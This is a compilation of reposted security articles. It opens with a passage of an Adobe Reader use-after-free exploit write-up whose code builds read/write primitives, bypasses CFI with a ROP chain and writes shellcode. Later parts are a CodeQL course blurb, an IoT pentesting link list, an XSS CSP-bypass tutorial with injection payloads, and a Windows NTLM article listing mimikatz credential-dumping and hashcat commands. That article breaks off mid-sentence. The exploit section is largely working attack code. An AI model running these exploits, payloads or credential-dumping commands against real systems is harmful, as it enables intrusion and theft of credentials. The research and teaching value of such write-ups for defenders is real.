08c62258 0000000e ffffff81 0000000f ffffff81 0:000> !heap -p -a 08c621e8 address 08c621e8 found in _HEAP @ 5570000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 08c621d0 0023 0000 [00] 08c621d8 00110 - (busy) So our goal now is to overwrite this elements buffer to inject a fake Javascript object. This is my plan at this point: Free Sound objects. Try to allocate dense arrays into the freed Sound objects location using currentValueIndices. Free the dense arrays. Try to allocate into the freed elements buffers Inject fake Javascript object The code below iterates through the SOUNDS array to free its elements and uses currentValueIndices to reclaim them: /* free and reclaim sound object */ RECLAIM_SZ = 512 RECLAIMS = Array(RECLAIM_SZ) THRESHOLD_SZ = 1024*6 NTRY = 3 NOBJ = 8 //18 for(var i=0; i<NOBJ; i++) { SOUNDS[i] = null //free one sound object gc() for(var j=0; j<THRESHOLD_SZ; j++) f.currentValueIndices try { //if the reclaim succeed `this.getSound` return an array instead and its first element should be 0 if (this.getSound(i)[0] == 0) { RECLAIMS[i] = this.getSound(i) } else { console.println('RECLAIM SOUND OBJECT FAILED: '+i) throw '' } } catch (err) { console.println('RECLAIM SOUND OBJECT FAILED: '+i) throw '' } gc() } console.println('RECLAIM SOUND OBJECT SUCCEED') Next, we will free all the dense arrays and try to allocate back into its elements buffer using TypedArray. I put faked integers with 0x33441122 at the start of the array to check if the reclaim succeeded. The corrupted array with our controlled elements buffer is then put into variable T: /* free all allocated array objects */ this.removeField("f") RECLAIMS = null f = null FENCES = null //free fence gc() for (var j=0; j<8; j++) SOUNDS[j] = this.getSound(j) /* reclaim freed element buffer */ for(var i=0; i<FREE_110_SZ; i++) { FREES_110[i] = new Uint32Array(64) FREES_110[i][0] = 0x33441122 FREES_110[i][1] = 0xffffff81 } T = null for(var j=0; j<8; j++) { try { // if the reclaim succeed the first element would be our injected number if (SOUNDS[j][0] == 0x33441122) { T = SOUNDS[j] break } } catch (err) {} } if (T==null) { console.println('RECLAIM element buffer FAILED') throw '' } else console.println('RECLAIM element buffer SUCCEED') From this point, we can put fake Javascript objects into our elements buffer and leak the address of objects assigned to it. The following code is used to find out which TypedArray is our fake elements buffer and leak its address. /* create and leak the address of an array buffer */ WRITE_ARRAY = new Uint32Array(8) T[0] = WRITE_ARRAY T[1] = 0x11556611 for(var i=0; i<FREE_110_SZ; i++) { if (FREES_110[i][0] != 0x33441122) { FAKE_ELES = FREES_110[i] WRITE_ARRAY_ADDR = FREES_110[i][0] console.println('WRITE_ARRAY_ADDR: ' + WRITE_ARRAY_ADDR.toString(16)) assert(WRITE_ARRAY_ADDR>0) break } else { FREES_110[i] = null } } Arbitrary Read/Write Primitives To achieve an abritrary read primitive I spray a bunch of fake string objects into the heap, then assign it into our elements buffer. GUESS = 0x20000058 //0x20d00058 /* spray fake strings */ for(var i=0x1100; i<0x1400; i++) { var dv = new DataView(SPRAY[i]) dv.setUint32(0, 0x102, true) //string header dv.setUint32(4, GUESS+12, true) //string buffer, point here to leak back idx 0x20000064 dv.setUint32(8, 0x1f, true) //string length dv.setUint32(12, i, true) //index into SPRAY that is at 0x20000058 delete dv } gc() //app.alert("Create fake string done") /* point one of our element to fake string */ FAKE_ELES[4] = GUESS FAKE_ELES[5] = 0xffffff85 /* create aar primitive */ SPRAY_IDX = s2h(T[2]) console.println('SPRAY_IDX: ' + SPRAY_IDX.toString(16)) assert(SPRAY_IDX>=0) DV = DataView(SPRAY[SPRAY_IDX]) function myread(addr) { //change fake string object's buffer to the address we want to read. DV.setUint32(4, addr, true) return s2h(T[2]) } Similarly to achieve arbitrary write, I create a fake TypedArray. I simply copy WRITE_ARRAY contents and change its SharedArrayRawBuffer pointer. /* create aaw primitive */ for(var i=0; i<32; i++) {DV.setUint32(i*4+16, myread(WRITE_ARRAY_ADDR+i*4), true)} //copy WRITE_ARRAY FAKE_ELES[6] = GUESS+0x10 FAKE_ELES[7] = 0xffffff87 function mywrite(addr, val) { DV.setUint32(96, addr, true) T[3][0] = val } //mywrite(0x200000C8, 0x1337) Gaining Code Execution With arbitrary read/write primitives, I can leak the base address of EScript.API in the TypedArray object’s header. Inside EScript.API there is a very convenient gadget to call VirtualAlloc. //d8c5e69b5ff1cea53d5df4de62588065 - md5sun of EScript.API ESCRIPT_BASE = myread(WRITE_ARRAY_ADDR+12) - 0x02784D0 //data:002784D0 qword_2784D0 dq ? console.println('ESCRIPT_BASE: '+ ESCRIPT_BASE.toString(16)) assert(ESCRIPT_BASE>0) Next I leak the base of address of AcroForm.API and the address of a CTextField (0x60 in size) object. First allocate a bunch of CTextField object using addField then create a string object also with size 0x60, then leak the address of this string (MARK_ADDR). We can safely assume that these CTextField objects will lie behind our MARK_ADDR. Finally I walk the heap to look for CTextField::vftable. /* leak .rdata:007A55BC ; const CTextField::`vftable' */ //f9c59c6cf718d1458b4af7bbada75243 for(var i=0; i<32; i++) this.addField(i, "text", 0, [0,0,0,0]); T[4] = STR_60.toLowerCase() for(var i=32; i<64; i++) this.addField(i, "text", 0, [0,0,0,0]); MARK_ADDR = myread(FAKE_ELES[8]+4) console.println('MARK_ADDR: '+ MARK_ADDR.toString(16)) assert(MARK_ADDR>0) vftable = 0 while (1) { MARK_ADDR += 4 vftable = myread(MARK_ADDR) if ( ((vftable&0xFFFF)==0x55BC) && (((myread(MARK_ADDR+8)&0xff00ffff)>>>0)==0xc0000000)) break } console.println('MARK_ADDR: '+ MARK_ADDR.toString(16)) assert(MARK_ADDR>0) /* leak acroform, icucnv58 base address */ ACROFORM_BASE = vftable-0x07A55BC console.println('ACROFORM_BASE: ' + ACROFORM_BASE.toString(16)) assert(ACROFORM_BASE>0) We can then overwrite CTextField object’s vftable to control PC. Bypassing CFI With CFI enabled, we cannot use ROP. I wrote a small script to look for any module that doesn’t have CFI enabled and is loaded at the time my exploit is running. I found icucnv58.dll. import pefile import os for root, subdirs, files in os.walk(r'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader'): for file in files: if file.endswith('.dll') or file.endswith('.exe') or file.endswith('.api'): fpath = os.path.join(root, file) try: pe = pefile.PE(fpath, fast_load=1) except Exception as e: print (e) print ('error', file) if (pe.OPTIONAL_HEADER.DllCharacteristics & 0x4000) == 0: print (file) The icucnv58.dll base address can be leaked via Acroform.API. There is enough gadgets inside icucnv58.dll to perform a stack pivot and ROP. //a86f5089230164fb6359374e70fe1739 - md5sum of `icucnv58.dll` r = myread(ACROFORM_BASE+0xBF2E2C) ICU_BASE = myread(r+16) console.println('ICU_BASE: ' + ICU_BASE.toString(16)) assert(ICU_BASE>0) g1 = ICU_BASE + 0x919d4 + 0x1000//mov esp, ebx ; pop ebx ; ret g2 = ICU_BASE + 0x73e44 + 0x1000//in al, 0 ; add byte ptr [eax], al ; add esp, 0x10 ; ret g3 = ICU_BASE + 0x37e50 + 0x1000//pop esp;ret Last Step Finally, we have everything we need to achieve full code execution. Write the shellcode into memory using the arbitrary write primitive then call VirtualProtect to enable execute permission. The full exploit code can be found at here if you are interested. As a result, the reliability of my UAF exploit can achieved a ~80% success rate. The exploitation takes about 3-5 seconds on average. If there are multiple retries required, the exploitation can take a bit more time. /* copy CTextField vftable */ for(var i=0; i<32; i++) mywrite(GUESS+64+i*4, myread(vftable+i*4)) mywrite(GUESS+64+5*4, g1) //edit one pointer in vftable // // /* 1st rop chain */ mywrite(MARK_ADDR+4, g3) mywrite(MARK_ADDR+8, GUESS+0xbc) // // /* 2nd rop chain */ rop = [ myread(ESCRIPT_BASE + 0x01B0058), //VirtualProtect GUESS+0x120, //return address GUESS+0x120, //buffer 0x1000, //sz 0x40, //new protect GUESS-0x20//old protect ] for(var i=0; i<rop.length;i++) mywrite(GUESS+0xbc+4*i, rop[i]) //shellcode shellcode = [835867240, 1667329123, 1415139921, 1686860336, 2339769483, 1980542347, 814448152, 2338274443, 1545566347, 1948196865, 4270543903, 605009708, 390218413, 2168194903, 1768834421, 4035671071, 469892611, 1018101719, 2425393296] for(var i=0; i<shellcode.length; i++) mywrite(GUESS+0x120+i*4, re(shellcode[i])) /* overwrite real vftable */ mywrite(MARK_ADDR, GUESS+64) Finally with that exploit, we can spawn our Calc. Sursa: https://starlabs.sg/blog/2020/04/tianfu-cup-2019-adobe-reader-exploitation/
  4. CodeQL U-Boot Challenge (C/C++) The GitHub Training Team Learn to use CodeQL, a query language that helps find bugs in source code. Find 9 remote code execution vulnerabilities in the open-source project Das U-Boot, and join the growing community of security researchers using CodeQL. Join 182 others! Quickly learn CodeQL, an expressive language for code analysis, which helps you explore source code to find bugs and vulnerabilities. During this beginner-level course, you will learn to write queries in CodeQL and find critical security vulnerabilities that were identified in Das U-Boot, a popular open-source project. What you'll learn Upon completion of the course, you'll be able to: Understand the basic syntax of CodeQL queries Use the standard CodeQL libraries to write queries and explore code written in C/C++ Use predicates and classes, the building blocks of CodeQL queries, to make your queries more expressive and reusable Use the CodeQL data flow and taint tracking libraries to write queries that find real security vulnerabilities What you'll build You will walk in the steps of our security researchers, and create: Several CodeQL queries that look for interesting patterns in C/C++ code. A CodeQL security query that finds 9 critical security vulnerabilities in the Das U-Boot codebase from 2019 (before it was patched!) and can be reused to audit other open-source projects of your choice. Pre-requisites Some knowledge of the C language and standard library. A basic knowledge of secure coding practices is useful to understand the context of this course, and all the consequences of the bugs we'll find, but is not mandatory to learn CodeQL. This is a beginner course. No prior knowledge of CodeQL is required. Audiences Security researchers Developers Sursa: https://lab.github.com/githubtraining/codeql-u-boot-challenge-(cc++)
  5. IoT Pentesting 101 && IoT Security 101 Approach Methodology 1. Network 2. Web (Front & Backend and Web services 3. Mobile App (Android & iOS) 4. Wireless Connectivity (Zigbee , WiFi , Bluetooth , etc) 5. Firmware Pentesting (OS of IoT Devices) 6. Hardware Hacking & Fault Injections & SCA Attacks 7. Storage Medium 8. I/O Ports To seen Hacked devices https://blog.exploitee.rs/2018/10/ https://www.exploitee.rs/ https://forum.exploitee.rs/ Your Lenovo Watch X Is Watching You & Sharing What It Learns Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT Smart Bulb Offers Light, Color, Music, and… Data Exfiltration? Besder-IPCamera analysis Smart Lock Subaru Head Unit Jailbreak Jeep Hack Chat groups for IoT Security https://t.me/iotsecurity1011 https://www.reddit.com/r/IoTSecurity101/ https://t.me/hardwareHackingBrasil https://t.me/joinchat/JAMxOg5YzdkGjcF3HmNgQw https://discord.gg/EH9dxT9 Books For IoT Pentesting Android Hacker's Handbook Hacking the Xbox Car hacker's handbook IoT Penetration Testing Cookbook Abusing the Internet of Things Hardware Hacking: Have Fun while Voiding your Warranty Linksys WRT54G Ultimate Hacking Linux Binary Analysis Firmware Hardware Hacking Handbook inside radio attack and defense Blogs for iotpentest https://payatu.com/blog/ http://jcjc-dev.com/ https://w00tsec.blogspot.in/ http://www.devttys0.com/ https://www.rtl-sdr.com/ https://keenlab.tencent.com/en/ https://courk.cc/ https://iotsecuritywiki.com/ https://cybergibbons.com/ http://firmware.re/ https://iotmyway.wordpress.com/ http://blog.k3170makan.com/ https://blog.tclaverie.eu/ http://blog.besimaltinok.com/category/iot-pentest/ https://ctrlu.net/ http://iotpentest.com/ https://blog.attify.com https://duo.com/decipher/ http://www.sp3ctr3.me http://blog.0x42424242.in/ https://dantheiotman.com/ https://blog.danman.eu/ https://quentinkaiser.be/ https://blog.quarkslab.com https://blog.ice9.us/ https://labs.f-secure.com/ https://mg.lol/blog/ https://cjhackerz.net/ Awesome CheatSheets Hardware Hacking Nmap Search Engines for IoT Devices Shodan FOFA Censys Zoomeye ONYPHE CTF For IoT's And Embeddded https://github.com/hackgnar/ble_ctf https://www.microcorruption.com/ https://github.com/Riscure/Rhme-2016 https://github.com/Riscure/Rhme-2017 https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html https://github.com/scriptingxss/IoTGoat YouTube Channels for IoT Pentesting Liveoverflow Binary Adventure EEVBlog JackkTutorials Craig Smith iotpentest [Mr-IoT] Besim ALTINOK - IoT - Hardware - Wireless Ghidra Ninja Cyber Gibbons Vehicle Security Resources https://github.com/jaredthecoder/awesome-vehicle-security IoT security vulnerabilites checking guides Reflecting upon OWASP TOP-10 IoT Vulnerabilities OWASP IoT Top 10 2018 Mapping Project Firmware Pentest Guide Hardware toolkits for IoT security analysis IoT Gateway Software Webthings by Mozilla - RaspberryPi Labs for Practice IoT Goat IoT Pentesting OSes Sigint OS- LTE IMSI Catcher Instatn-gnuradio OS - For Radio Signals Testing AttifyOS - IoT Pentest OS - by Aditya Gupta Ubutnu Best Host Linux for IoT's - Use LTS Internet of Things - Penetration Testing OS Dragon OS - DEBIAN LINUX WITH PREINSTALLED OPEN SOURCE SDR SOFTWARE EmbedOS - Embedded security testing virtual machine Exploitation Tools Expliot - IoT Exploitation framework - by Aseemjakhar A Small, Scalable Open Source RTOS for IoT Embedded Devices Skywave Linux- Software Defined Radio for Global Online Listening Routersploit (Exploitation Framework for Embedded Devices) IoTSecFuzz (comprehensive testing for IoT device) Reverse Engineering Tools IDA Pro GDB Radare2 | cutter Ghidra Introduction Introduction to IoT IoT Architecture IoT attack surface IoT Protocols Overview MQTT Introduction Hacking the IoT with MQTT thoughts about using IoT MQTT for V2V and Connected Car from CES 2014 Nmap The Seven Best MQTT Client Tools A Guide to MQTT by Hacking a Doorbell to send Push Notifications Are smart homes vulnerable to hacking Softwares Mosquitto HiveMQ MQTT Explorer CoAP Introduction CoAP client Tools CoAP Pentest Tools Nmap Automobile CanBus Introduction and protocol Overview PENTESTING VEHICLES WITH CANTOOLZ Building a Car Hacking Development Workbench: Part1 CANToolz - Black-box CAN network analysis framework PLAYING WITH CAN BUS Radio IoT Protocols Overview Understanding Radio Signal Processing Software Defined Radio Gnuradio Creating a flow graph Analysing radio signals Recording specific radio signal Replay Attacks Base transceiver station (BTS) what is base tranceiver station How to Build Your Own Rogue GSM BTS GSM & SS7 Pentesting Introduction to GSM Security GSM Security 2 vulnerabilities in GSM security with USRP B200 Security Testing 4G (LTE) Networks Case Study of SS7/SIGTRAN Assessment Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP ss7MAPer – A SS7 pen testing toolkit Introduction to SIGTRAN and SIGTRAN Licensing SS7 Network Architecture Introduction to SS7 Signaling Breaking LTE on Layer Two Zigbee & Zwave Introduction and protocol Overview Hacking Zigbee Devices with Attify Zigbee Framework Hands-on with RZUSBstick ZigBee & Z-Wave Security Brief BLE Intro and SW & HW Tools Step By Step guide to BLE Understanding and Exploiting Traffic Engineering in a Bluetooth Piconet BLE Characteristics Reconnaissance (Active and Passive) with HCI Tools btproxy hcitool & bluez Testing With GATT Tool Cracking encryption bettercap BtleJuice Bluetooth Smart Man-in-the-Middle framework gattacker BTLEjack Bluetooth Low Energy Swiss army knife Hardware NRFCONNECT - 52840 EDIMAX CSR 4.0 ESP32 - Development and learning Bluetooth Ubertooth Sena 100 BLE Pentesting Tutorials Bluetooth vs BLE Basics Intel Edison as Bluetooth LE — Exploit box How I Reverse Engineered and Exploited a Smart Massager My journey towards Reverse Engineering a Smart Band — Bluetooth-LE RE Bluetooth Smartlocks I hacked MiBand 3 GATTacking Bluetooth Smart Devices Mobile security (Android & iOS) Android App Reverse Engineering 101 Android Application pentesting book Android Pentest Video Course-TutorialsPoint IOS Pentesting OWASP Mobile Security Testing Guide Android Tamer - Android Tamer is a Virtual / Live Platform for Android Security professionals Online Assemblers AZM Online Arm Assembler by Azeria Online Disassembler Compiler Explorer is an interactive online compiler which shows the assembly output of compiled C++, Rust, Go ARM Azeria Labs ARM EXPLOITATION FOR IoT Damn Vulnerable ARM Router (DVAR) EXPLOIT.EDUCATION Pentesting Firmwares and emulating and analyzing Firmware analysis and reversing Firmware emulation with QEMU Dumping Firmware using Buspirate Reversing ESP8266 Firmware Emulating Embedded Linux Devices with QEMU Emulating Embedded Linux Systems with QEMU Fuzzing Embedded Linux Devices Emulating ARM Router Firmware Reversing Firmware With Radare Samsung Firmware Magic Firmware samples to pentest Download From here IoT hardware Overview IoT Hardware Guide Hardware Gadgets to pentest Bus Pirate EEPROM reader/SOIC Cable Jtagulator/Jtagenum Logic Analyzer The Shikra FaceDancer21 (USB Emulator/USB Fuzzer) RfCat Hak5Gear- Hak5FieldKits Ultra-Mini Bluetooth CSR 4.0 USB Dongle Adapter Attify Badge - UART, JTAG, SPI, I2C (w/ headers) Attacking Hardware Interfaces Serial Terminal Basics Reverse Engineering Serial Ports REVERSE ENGINEERING ARCHITECTURE AND PINOUT OF CUSTOM ASICS UART Identifying UART interface onewire-over-uart Accessing sensor via UART Using UART to connect to a chinese IP cam A journey into IoT – Hardware hacking: UART JTAG Identifying JTAG interface NAND Glitching Attack\ SideChannel Attacks All Attacks Awesome IoT Pentesting Guides Shodan Pentesting Guide Car Hacking Practical Guide 101 OWASP Firmware Security Testing Methodology Vulnerable IoT and Hardware Applications IoT : https://github.com/Vulcainreo/DVID Safe : https://insinuator.net/2016/01/damn-vulnerable-safe/ Router : https://github.com/praetorian-code/DVRF SCADA : https://www.slideshare.net/phdays/damn-vulnerable-chemical-process PI : https://whitedome.com.au/re4son/sticky-fingers-dv-pi/ SS7 Network: https://www.blackhat.com/asia-17/arsenal.html#damn-vulnerable-ss7-network VoIP : https://www.vulnhub.com/entry/hacklab-vulnvoip,40/ follow the people Jilles Aseem Jakhar Cybergibbons Ilya Shaposhnikov Mark C. A-a-ron Guzman Arun Mane Yashin Mehaboobe Arun Magesh Sursa: https://github.com/V33RU/IoTSecurity101
  6. Bypassing modern XSS mitigations with code-reuse attacks Alexander Andersson 2020-04-03 Cyber Security Cross-site Scripting (XSS) has been around for almost two decades yet it is still one of the most common vulnerabilities on the web. Many second-line mechanisms have therefore evolved to mitigate the impact of the seemingly endless flow of new vulnerabilities. Quite often I meet the misconception that these second-line mechanisms can be relied upon as the single protection against XSS. Today we’ll see why this is not the case. We’ll explore a relatively new technique in the area named code-reuse attacks. Code-reuse attacks for the web were first described in 2017 and can be used to bypass most modern browser protections including: HTML sanitizers, WAFs/XSS filters, and most Content Security Policy (CSP) modes. Introduction Let’s do a walkthrough using an example: 1 <?php 2 /* File: index.php */ 3 // CSP disabled for now, will enable later 4 // header("Content-Security-Policy: script-src 'self' 'unsafe-eval'; object-src 'none';"); 5 ?> 6 7 <!DOCTYPE html> 8 <html lang="en"> 9 <body> 10 <div id="app"> 11 </div> 12 <script src="http://127.0.0.1:8000/main.js"></script> 13 </body> 14 </html> 1 /** FILE: main.js **/ 2 var ref=document.location.href.split("?injectme=")[1]; 3 document.getElementById("app").innerHTML = decodeURIComponent(ref); The app has a DOM-based XSS vulnerability. Main.js gets the value of the GET parameter “injectme” and inserts it to the DOM as raw HTML. This is a problem because the user can control the value of the parameter. The user can therefore manipulate the DOM at will. The request below is a proof of concept that proves that we can inject arbitrary JavaScript. Before sending the request we first start a local test environment on port 8000 (php -S 127.0.0.1 8000). 1 http://127.0.0.1:8000/?injectme=<img src="n/a" onerror="alert('XSS')"/> The image element will be inserted into the DOM and it will error during load, which triggers the onerror event handler. This gives an alert popup saying “XSS”, proving that we can make the app run arbitrary JavaScript. Now enable Content Security Policy by removing the comment on line 5 in index.php. Then reload the page you’ll see that the attack failed. If you open the developer console in your browser, you’ll see a message explaining why. Cool! So what happened? The IMG html element was created, the browser saw an onerror event attribute but refused to execute the JavaScript because of the CSP. Bypassing CSP with an unrealistically simple gadget The CSP in our example says that – JavaScript from the same host (self) is allowed – Dangerous functions such as eval are allowed (unsafe-eval) – All other scripts are blocked – All objects are blocked (e.g. flash) We should add that it is always up to the browser to actually respect the CSP. But if it does, we can’t just inject new JavaScript, end of discussion. But what if we could somehow trigger already existing JavaScript code that is within the CSP white list? If so, we might be able to execute arbitrary JavaScript without violating the policy. This is where the concept of gadgets comes in. A script gadget is a piece of legitimate JavaScript code that can be triggered via for example an HTML injection. Let’s look at a simple example of a gadget to understand the basic idea. Assume that the main.js file looked like this instead: 1 /** FILE: main.js **/ 2 var ref = document.location.href.split("?injectme=")[1]; 3 document.getElementById("app").innerHTML = decodeURIComponent(ref); 4 5 document.addEventListener("DOMContentLoaded", function() { 6 var expression = document.getElementById("expression").getAttribute("data"); 7 var parsed = eval(expression); 8 document.getElementById("result").innerHTML = '<p>'+parsed+'</p>'; 9 }); The code is basically the same but this time our target also has some kind of math calculator. Notice that only main.js is changed, index.php is the same as before. You can think of the math function as some legacy code that is not really used. As attackers, we can abuse/reuse the math calculator code to reach an eval and execute JavaScript without violating the CSP. We don’t need to inject JavaScript . We just need to inject an HTML element with the id “expression” and an attribute named “data”. Whatever is inside data will be passed to eval. We give it a shot, and yay! We bypassed the CSP and got an alert! Moving on to realistic script gadgets Websites nowadays include a lot of third-party resources and it is only getting worse. These are all legitimate whitelisted resources even if there is a CSP enforced. Maybe there are interesting gadgets in those millions of lines of JavaScript? Well yes! Lekies et al. (2017) analyzed 16 widely used JavaScript libraries and found that there are multiple gadgets in almost all libraries. There are several types of gadgets, and they can be directly useful or require chaining with other gadgets to be useful. String manipulation gadgets: Useful to bypass pattern-based mitigation. Element construction gadgets: Useful to bypass XSS mitigations, for example to create script elements. Function creation gadgets: Can create new Function objects, that can later be executed by a second gadget. JavaScript execution sink gadgets: Similar to the example we just saw, can either standalone or the final step in a chain Gadgets in expression parsers: These abuse the framework specific expression language used in templates. Let’s take a look at another example. We will use the same app but now let’s include jQuery mobile. 1 <?php 2 /** FILE: index.php **/ 3 header("Content-Security-Policy: script-src 'self' https://code.jquery.com:443 'unsafe-eval'; object-src 'none';"); 4 ?> 5 6 <!DOCTYPE html> 7 <html lang="en"> 8 <body> 9 <p id="app"></p> 10 <script src="http://127.0.0.1:8000/main.js"></script> 11 <script src="https://code.jquery.com/jquery-1.8.3.min.js"></script> 12 <script src="https://code.jquery.com/mobile/1.2.1/jquery.mobile-1.2.1.min.js"></script> 13 </body> 14 </html> 1 /** FILE: main.js **/ 2 var ref = document.location.href.split("?injectme=")[1]; 3 document.getElementById("app").innerHTML = decodeURIComponent(ref); The CSP has been slightly changed to allow anything from code.jquery.com, and luckily for us, jQuery Mobile has a known script gadget that we can use. This gadget can also bypass CSP with strict-dynamic. Let’s start by considering the following html. 1 <div data-role=popup id='hello world'></div> This HTML will trigger code in jQuery Mobile’s Popup Widget. What might not be obvious is that when you create a popup, the library writes the id attribute into an HTML comment. The code in jQuery responsible for this, looks like the below: This is a code gadget that we can abuse to run JavaScript. We just need to break out of the comment and then we can do whatever we want. Our final payload will look like this: 1 <div data-role=popup id='--!><script>alert("XSS")</script>'></div> Execute, and boom! Some final words This has been an introduction to code-reuse attacks on the web and we’ve seen an example of a real-world script gadget in jQuery Mobile. We’ve only seen CSP bypasses but as said, this technique can be used to bypass HTML sanitizers, WAFs, and XSS filters such as NoScript as well. If you are interested in diving deeper I recommend reading the paper from Lekies et al. and specifically looking into gadgets in expression parsers. These gadgets are very powerful as they do not rely on innerHTML or eval. There is no doubt that mitigations such as CSP should be enforced as they raise the bar for exploitation. However, they must never be relied upon as the single layer of defense. Spend your focus on actually fixing your vulnerabilities. The fundamental principle is that you need to properly encode user-controlled data. The characters in need of encoding will vary based on the context in which the data is inserted. For example, there is a difference if you are inserting data inside tags (e.g. <div>HERE</div>), inside a quoted attribute (e.g. <div title=”HERE“></div>), unquoted attribute (e.g. <div title=HERE></div>), or in an event attribute (e.g. <div onmouseenter=”HERE“></div>). Make sure to use a framework that is secure-by-default and read up on the pitfalls in your specific framework. Also never use the dangerous functions that completely bypasses the built-in security, such as trustAsHtml in Angular and dangerouslySetInnerHTML in React. Want to learn more? Except being a Security Consultant performing Penetrationtests, Alexander is a popular instructor. If you want to learn more about XSS Mitigations, Code-reuse attacks and learn how hackers attack your environment, check out his 3 days training: Secure Web Development and Hacking for Developers. Sursa: https://blog.truesec.com/2020/04/03/bypassing-modern-xss-mitigations-with-code-reuse-attacks/
  7. HTTP requests are traditionally viewed as isolated, standalone entities. In this session, I'll introduce techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $70k in bug bounties. By James Kettle Full Abstract & Presentation Materials: https://www.blackhat.com/eu-19/briefi...
  8. Windows authentication attacks – part 1 In order to understand attacks such as Pass the hash, relaying, Kerberos attacks, one should have pretty good knowledge about the windows Authentication / Authorization process. That’s what we’re going to achieve in this series. In this part we’re discussing the different types of windows hashes and focus on the NTLM authentication process. 10 0 Tweet Share Arabic Table of Contents I illustrated most of the concepts in this blog post in Arabic at the following video This doesn’t contain all the details in the post but yet will get you the fundamentals you need to proceed with the next parts. Windows hashes LM hashes It was the dominating password storing algorithm on windows till windows XP/windows server 2003. It’s disabled by default since windows vista/windows server 2008. LM was a weak hashing algorithm for many reasons, You will figure these reasons out once You know how LM hashing works. LM hash generation? Let’s assume that the user’s password is PassWord 1 – All characters will be converted to upper case PassWord -> PASSWORD 2 – In case the password’s length is less than 14 characters it will be padded with null characters, so its length becomes 14, so the result will be PASSWORD000000 3 – These 14 characters will be split into 2 halves PASSWOR D000000 4 – Each half is converted to bits, and after every 7 bits, a parity bit (0) will be added, so the result would be a 64 bits key. 1101000011 -> 11010000011 As a result, we will get two keys from the 2 pre-generated halves after adding these parity bits 5 – Each of these keys is then used to encrypt the string “KGS!@#$%” using DES algorithm in ECB mode so that the result would be PASSWOR = E52CAC67419A9A22 D000000 = 4A3B108F3FA6CB6D 6 – The output of the two halves is then combined, and that makes out LM hash E52CAC67419A9A224A3B108F3FA6CB6D You can get the same result using the following python line. python -c 'from passlib.hash import lmhash;print lmhash.hash("password")' Disadvantages As you may already think, this is a very weak algorithm, Each hash has a lot of possibilities, for example, the hashes of the following passwords Password1 pAssword1 PASSWORD1 PassWord1 . . . ETC It will be the same!!!! Let’s assume a password like passwordpass123 The upper and lowercase combinations will be more than 32000 possibilities, and all of them will have the same hash! You can give it a try. import itertools len(map(''.join, itertools.product(*zip("Passwordpass123".upper(), "Passwordpass123".lower())))) Also, splitting the password into two halves makes it easier, as the attacker will be trying to brute force just a seven-character password! LM hash accepts only the 95 ASCII characters, but yet all lower case characters are converted to upper case, which makes it only 69 possibilities per character, which makes it just 7.5 trillion possibilities for each half instead of the total of 69^14 for the whole 14 characters. Rainbow tables already exist containing all these possibilities, so cracking Lan Manager hashes isn’t a problem at all Moreover, in case that the password is seven characters or less, the attacker doesn’t need to brute force the 2nd half as it has the fixed value of AAD3B435B51404EE Example Creating hash for password123 and cracking it. You will notice that john got me the password “PASSWORD123” in upper case and not “password123”, and yeah, both are just true. Obviously, the whole LM hashing stuff was based on the fact that no one will reverse it as well as no one will get into the internal network to be in a MITM position to capture it. As mentioned earlier, LM hashes are disabled by default since Windows Vista + Windows server 2008. NTLM hash <NTHash> NTHash AKA NTLM hash is the currently used algorithm for storing passwords on windows systems. While NET-NTLM is the name of the authentication or challenge/response protocol used between the client and the server. If you made a hash dump or pass the hash attack before so no doubt you’ve seen NTLM hash already. You can obtain it via Dumping credentials from memory using mimikatz Eg, sekurlsa::logonpasswords Dumping SAM using C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SAM Then reading hashes offline via Mimikatz lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv And sure via NTDS where NTLM hashes are stored in ActiveDirectory environments, You’re going to need administrator access over the domain controller, A domain admin privs for example You can do this either manually or using DCsync within mimikatz as well NTLM hash generation Converting a plaintext password into NTLM isn’t complicated, it depends mainly on the MD4 hashing algorithm 1 – The password is converted to Unicode 2 – MD4 is then used to convert it to the NTLM Just like MD4(UTF-16-LE(password)) 3 – Even in case of failing to crack the hash, it can be abused using Pass the hash technique as illustrated later. Since there are no salts used while generating the hash, cracking NTLM hash can be done either by using pre-generated rainbow tables or using hashcat. hashcat -m 3000 -a 3 hashes.txt Net-NTLMv1 This isn’t used to store passwords, it’s actually a challenge-response protocol used for client/server authentication in order to avoid sending user’s hash over the network. That’s basically how Net-NTLM authentication works in general. I will discuss how that protocol works in detail, but all you need to know for now is that NET-NTLMv1 isn’t used anymore by default except for some old versions of windows. The NET-NTLMv1 looks like username::hostname:response:response:challenge It can’t be used directly to pass the hash, yet it can be cracked or relayed as I will mention later. Since the challenge is variable, you can’t use rainbow tables against Net-NTLMv1 hash, But you can crack it by brute-forcing the password using hashcat using hashcat -m 5500 -a 3 hashes.txt This differs from NTLMv1-SSP in which the server response is changed at the client-side NTLMv1 and NTLMv1-SSP are treated differently during cracking or even downgrading, this will be discussed at the NTLM attacks part. Net-NTLMv2 A lot of improvements were made for v1, this is the version being used nowadays at windows systems. The authentication steps are the same, except for the challenge-response generation algorithm, and the NTLM challenge length which in this case is variable instead of the fixed 16-bytes number at Net-NTLMv1. At Net-NTLMv2 any parameters are added by the client such as client nonce, server nonce, timestamp as well as the username and encrypt them, that’s why you will find the length of Net-NTLMv2 hashes varies from user to another. Net-NTLMv2 can’t be used for passing the hash attack, or for offline relay attacks due to the security improvements made. But yet it still can be relayed or cracked, the process is slower but yet applicable. I will discuss that later as well. Net-NTLMv2 hash looks like It can be cracked using hashcat -m 5600 hash.txt Net-NTLM Authentication In a nutshell Let’s assume that our client (192.168.18.132) is being used to connect to the windows server 2008 machine (192.168.18.139) That server isn’t domain-joined, means that all the authentication process is going to happen between the client and the server without having to contact any other machines, unlike what may happen in the 2nd scenario. The whole authentication process can be illustrated in the following picture. Client IP : 192.168.18.132 [Kali linux] Server IP: 192.168.18.139 [Windows server 2008 non-domain joined] 0 – The user enters his/her username and password 1 – The client initiates a negotiation request with the server, that request includes any information about the client capabilities as well as the Dialect or the protocols that the client supports. 2 – The server picks up the highest dialect and replies through the Negotiation response message then the authentication starts. 3 – The client then negotiates an authentication session with the server to ask for access, this request contains also some information about the client including the NTLM 8 bytes signature (‘N’, ‘T’, ‘L’, ‘M’, ‘S’, 